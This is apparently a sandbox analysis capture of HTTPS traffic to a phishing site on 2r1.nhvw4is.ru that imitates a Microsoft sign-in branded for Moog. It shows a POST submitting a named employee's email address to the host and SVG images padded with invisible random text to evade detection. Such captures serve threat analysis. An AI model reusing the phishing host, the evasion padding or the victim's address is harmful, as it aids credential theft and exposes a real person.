                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 57 59 53 6a 67 48 64 78 41 44 7a 4c 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 47 6f 5a 5a 68 51 68 65 70 53 62 72 6e 6f 4f 45 74 6a 61 3c 2f 74 65 78 74 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 36 33 32 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 20 56 50 78 44 5a 6f 54 6f 50 4d 41 6a 79 4d 3d 22 57 4c 5a 69 4c 67 56 4d 6a 59 41 4e 4a 4a 79 72 66 6a 4a 59 76 22 20 20 66 69 6c 6c 3d 22 23 46 30 33 45 30 44 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69
                                                                                                                                                              Data Ascii: WYSjgHdxADzL</text><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">GoZZhQhepSbrnoOEtja</text><rect width="10.632" height="10.931" VPxDZoToPMAjyM="WLZiLgVMjYANJJyrfjJYv" fill="#F03E0D"/><text style="di
                                                                                                                                                              2024-01-17 16:39:33 UTC122INData Raw: 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 49 56 47 45 58 46 78 64 63 7a 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                              Data Ascii: t style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">IVGEXFxdcz</text></svg>
                                                                                                                                                              2024-01-17 16:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              50192.168.2.449811172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:33 UTC912OUTPOST /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/3tDjnOJo1wyWZPuEmK2mWIfU HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 30
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Origin: https://2r1.nhvw4is.ru
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC30OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 61 69 6c 3d 6b 6d 6f 72 61 6e 40 6d 6f 6f 67 2e 63 6f 6d
                                                                                                                                                              Data Ascii: do=check&email=kmoran@moog.com
                                                                                                                                                              2024-01-17 16:39:34 UTC741INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:34 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=APA%2BHT37Ov1MivMCv2NbvxqX2s1pgkeP41iRZ5Nwnk5n%2FtVCvZfD5pJkgUsPiTC0WwkwszWlwLR8K3dDfAhVTiCgzLu4X59HhwYe9GUWu0%2BGqxy0bkcMp0eg4beNtl9NRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008f42e070f6d-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:34 UTC273INData Raw: 31 30 61 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 62 61 6e 6e 65 72 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 69 6d 61 67 65 73 2e 6e 65 74 5c 2f 64 62 64 35 61 32 64 64 2d 79 63 63 6b 2d 71 64 67 76 61 6f 62 6a 78 69 63 7a 68 30 73 62 6a 38 71 75 65 71 74 70 78 72 67 35 77 61 63 68 6b 69 35 77 64 75 5c 2f 6c 6f 67 69 6e 74 65 6e 61 6e 74 62 72 61 6e 64 69 6e 67 5c 2f 30 5c 2f 62 61 6e 6e 65 72 6c 6f 67 6f 3f 74 73 3d 36 33 36 34 30 38 32 36 35 35 33 39 38 39 30 39 36 33 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 6e 75 6c 6c 2c 22 62 6f 69 6c 65 72 50 6c 61 74 65 54 65 78 74 22 3a 22 3c 70 3e 41 75 74 68 6f 72 69 7a 65 64 20 61 63 63 65 73 73 20 62 79 20 4d 6f 6f 67 20 70 65 72 73 6f 6e 6e
                                                                                                                                                              Data Ascii: 10a{"status":"success","banner":"https:\/\/aadcdn.msauthimages.net\/dbd5a2dd-ycck-qdgvaobjxiczh0sbj8queqtpxrg5wachki5wdu\/logintenantbranding\/0\/bannerlogo?ts=636408265539890963","background":null,"boilerPlateText":"<p>Authorized access by Moog personn
                                                                                                                                                              2024-01-17 16:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              51192.168.2.449812172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:33 UTC809OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6r1OvgEPyH9fqusm1kFxOY9HI7jFC/2GXuLuN6KqlYKs49PJP4M HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:34 UTC698INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:34 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CQ0FH2EsiLhMUOzbEpmtvmPIKTwni5wCOWfbJglWRgPdJc49cd6nd1h%2BRxqj4bSQ3uRML2G9eoffu%2FSwUlnCRHWNdKKFuub8mWIVssJNMx%2BwEs6eqBuhsYppY7VVtpzQAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008f42dd88c5f-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:34 UTC671INData Raw: 31 39 36 30 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6c 37 6d 63 79 6c 31 49 6f 62 6c 6a 31 31 6d 38 49 64 6b 3c 2f 74 65 78 74 3e 3c 74 69 74 6c 65 3e 62 31 47 75 69 66 77 75 57 37 32 41 79 38 69 53 4e 53 52 49 71 68 3c 2f 74 69 74 6c 65 3e 3c 67
                                                                                                                                                              Data Ascii: 1960<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">l7mcyl1Ioblj11m8Idk</text><title>b1GuifwuW72Ay8iSNSRIqh</title><g
                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 41 29 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 42 53 6f 6e 39 7a 73 6e 71 6a 58 59 33 68 38 35 6f 47 63 6f 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36
                                                                                                                                                              Data Ascii: 1401.6 1720.8 1401.6z" fill="url(#A)"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">BSon9zsnqjXY3h85oGco</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6
                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 33 61 55 71 30 79 4b 75 35 4e 5a 59 39 4f 77 78 77 48 4c 4e 42 6b 43 52 4d 47 49 3c 2f 74 65 78 74 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e
                                                                                                                                                              Data Ascii: 01px;max-height: 0.01px;font-size: 0.01px;">3aUq0yKu5NZY9OwxwHLNBkCRMGI</text><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inlin
                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 64 78 41 75 65 4a 30 71 45 30 6c 6e 77 51 62 48 48 50 6e 49 6d 33 44 79 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 79 76 35 6f 6c 42 6d 65 75 63 56 73 63 74 34 52 6d 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d
                                                                                                                                                              Data Ascii: t: 0.03px; font-size: 0.02px;">dxAueJ0qE0lnwQbHHPnIm3Dy</text><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">yv5olBmeucVsct4Rm</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style=
                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 36 35 2e 38 20 31 39 38 29 20 72 6f 74 61 74 65 28 38 32 29 20 73 63 61 6c 65 28 31 30 31 37 2e 36 20 31 32 34 39 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 68 6e 39 63 44 76 4c 63 65 76 59 6e 50 66 6b 58 56 47 57 62 62 56 6f 6b 36 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d
                                                                                                                                                              Data Ascii: rSpaceOnUse" gradientTransform="translate(265.8 198) rotate(82) scale(1017.6 1249.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">hn9cDvLcevYnPfkXVGWbbVok6</text><stop stop-color="#d83b01" stop-
                                                                                                                                                              2024-01-17 16:39:34 UTC357INData Raw: 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 35 36 4f 6f 6f 59 66 70 47 39 68 6f 6e 73 79 7a 39 68 32 4e 49 6f 70 6d 61 4c 3c 2f 74 65 78 74 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 77 50 71 61 44 35 65 53 74 35 38 53 74 64 46 4d 69 3c 2f 74 65 78 74 3e 3c 2f 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d
                                                                                                                                                              Data Ascii: 0.01px;font-size: 0.01px;">56OooYfpG9honsyz9h2NIopmaL</text></clipPath><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">wPqaD5eSt58StdFMi</text></defs><text style="display: inline; color: #1A7D75; m
                                                                                                                                                              2024-01-17 16:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              52192.168.2.449813172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:33 UTC798OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6MipOpOZrol77bJu4Jez1PxICsw/2eVSshKvifDU HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:34 UTC706INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:34 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8%2Bp0%2BKuunbqG9Q9dPo3mMTHLXeyYKXKf640oRoYdk4ryw4CGUd6yho0Ch9BY6ZH%2F%2FpIRhJSLttFKn4puYsZHGh4y7%2FC%2F1YxKF9nlkzYpTxIsBOT%2FkQD6m32ucLA98M7uqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008f46a3c1a03-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:34 UTC663INData Raw: 31 39 37 30 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 49 34 30 61 4d 41 48 63 7a 47 71 49 63 3c 2f 74 65 78 74 3e 3c 74 69 74 6c 65 3e 73 49 72 4a 6f 62 63 43 6d 35 76 49 58 3c 2f 74 69 74 6c 65 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63
                                                                                                                                                              Data Ascii: 1970<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">I40aMAHczGqIc</text><title>sIrJobcCm5vIX</title><g opacity=".2" c
                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 38 20 31 34 30 31 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 41 29 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 51 57 52 6c 54 63 4c 73 4b 53 64 4a 41 67 4a 37 72 59 46 62 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36
                                                                                                                                                              Data Ascii: 8 1401.6z" fill="url(#A)"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">QWRlTcLsKSdJAgJ7rYFb</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.6
                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 39 64 71 42 75 49 6a 42 44 31 6e 51 43 5a 31 4a 3c 2f 74 65 78 74 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b
                                                                                                                                                              Data Ascii: x-height: 0.01px;font-size: 0.01px;">9dqBuIjBD1nQCZ1J</text><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75;
                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 4e 55 48 62 45 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 77 73 4f 31 54 64 78 43 49 31 74 6f 38 54 34 44 67 37 52 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30
                                                                                                                                                              Data Ascii: NUHbE</text><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">wsO1TdxCI1to8T4Dg7R</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.0
